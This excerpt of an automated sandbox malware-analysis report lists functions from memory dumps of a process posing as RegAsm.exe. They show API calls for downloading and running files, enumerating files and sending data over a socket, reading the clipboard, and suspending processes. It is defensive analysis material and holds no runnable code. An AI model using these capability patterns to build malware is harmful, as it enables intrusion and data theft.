                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoLocale
                            • String ID: ACP$OCP
                            • API String ID: 2299586839-711371036
                            • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                            • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                            • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                            • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                            APIs
                            • FindResourceA.KERNEL32 ref: 0041B54A
                            • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                            • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                            • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Resource$FindLoadLockSizeof
                            • String ID: SETTINGS
                            • API String ID: 3473537107-594951305
                            • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                            • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                            • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                            • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                            APIs
                            • __EH_prolog.LIBCMT ref: 004096A5
                            • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                            • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstH_prologNext
                            • String ID:
                            • API String ID: 1157919129-0
                            • Opcode ID: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                            • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                            • Opcode Fuzzy Hash: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                            • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                            APIs
                            • __EH_prolog.LIBCMT ref: 0040884C
                            • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                            • String ID:
                            • API String ID: 1771804793-0
                            • Opcode ID: b1eb176887f564738bcb701d3fa8af3362899acb6c57e34aba652b3bc19319a0
                            • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                            • Opcode Fuzzy Hash: b1eb176887f564738bcb701d3fa8af3362899acb6c57e34aba652b3bc19319a0
                            • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                            APIs
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                            • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: DownloadExecuteFileShell
                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                            • API String ID: 2825088817-3056885514
                            • Opcode ID: fe84851e8d7f70732d898fdaef0aba1a4162abd4a1fe116b66043c687c2ffd0e
                            • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                            • Opcode Fuzzy Hash: fe84851e8d7f70732d898fdaef0aba1a4162abd4a1fe116b66043c687c2ffd0e
                            • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                            • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileFind$FirstNextsend
                            • String ID: XPG$XPG
                            • API String ID: 4113138495-1962359302
                            • Opcode ID: edb16b4144dcf9e536f362a26b882d6c4348f4f9c8c054f169ec42c10df1cf14
                            • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                            • Opcode Fuzzy Hash: edb16b4144dcf9e536f362a26b882d6c4348f4f9c8c054f169ec42c10df1cf14
                            • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                            APIs
                              • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                            • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                            • String ID: p'E$JD
                            • API String ID: 1084509184-908320845
                            • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                            • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                            • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                            • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                            APIs
                              • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorInfoLastLocale$_free$_abort
                            • String ID:
                            • API String ID: 2829624132-0
                            • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                            • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                            • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                            • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                            APIs
                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                            • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                            • String ID:
                            • API String ID: 3906539128-0
                            • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                            • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                            • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                            • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                            APIs
                            • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                            • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                            • String ID:
                            • API String ID: 3906539128-0
                            • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                            • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                            • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                            • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                            • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                            • ExitProcess.KERNEL32 ref: 10004AEE
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                            • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                            • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                            • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                            • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                            • ExitProcess.KERNEL32 ref: 0044338F
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                            • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                            • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                            • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Clipboard$CloseDataOpen
                            • String ID:
                            • API String ID: 2058664381-0
                            • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                            • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                            • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                            • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                            APIs
                            • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                            • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                            • CloseHandle.KERNEL32(00000000), ref: 0041BBE7
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CloseHandleOpenResume
                            • String ID:
                            • API String ID: 3614150671-0
                            • Opcode ID: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                            • Instruction ID: 00af7d86c2812e48088786baf9e1e683bef33431c8858657b58e82835f0f92e7
                            • Opcode Fuzzy Hash: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                            • Instruction Fuzzy Hash: 7AD05E36204121E3C220176A7C0CD97AD68DBC5AA2705412AF804C22609A60CC0186E4
                            APIs
                            • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                            • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                            • CloseHandle.KERNEL32(00000000), ref: 0041BBBB
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CloseHandleOpenSuspend
                            • String ID:
                            • API String ID: 1999457699-0
                            • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                            • Instruction ID: 611eda4fe747f1c58df557fb912083c2b4b70512fbfbfb6239720577e9304ccf
                            • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                            • Instruction Fuzzy Hash: 98D05E36204121E3C7211B6A7C0CD97AD68DFC5AA2705412AF804D26549A20CC0186E4
                            APIs
                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: FeaturePresentProcessor
                            • String ID: MZ@
                            • API String ID: 2325560087-2978689999
                            • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                            • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                            • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                            • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: .
                            • API String ID: 0-248832578
                            • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                            • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                            • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                            • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: .
                            • API String ID: 0-248832578
                            • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                            • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                            • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                            • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                            APIs
                              • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                            • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                            • String ID: JD
                            • API String ID: 1084509184-2669065882
                            • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                            • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                            • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                            • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                            APIs
                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoLocale
                            • String ID: GetLocaleInfoEx
                            • API String ID: 2299586839-2904428671
                            • Opcode ID: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                            • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                            • Opcode Fuzzy Hash: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                            • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                            APIs
                              • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                            • String ID:
                            • API String ID: 1661935332-0
                            • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                            • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                            • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                            • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                            APIs
                              • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
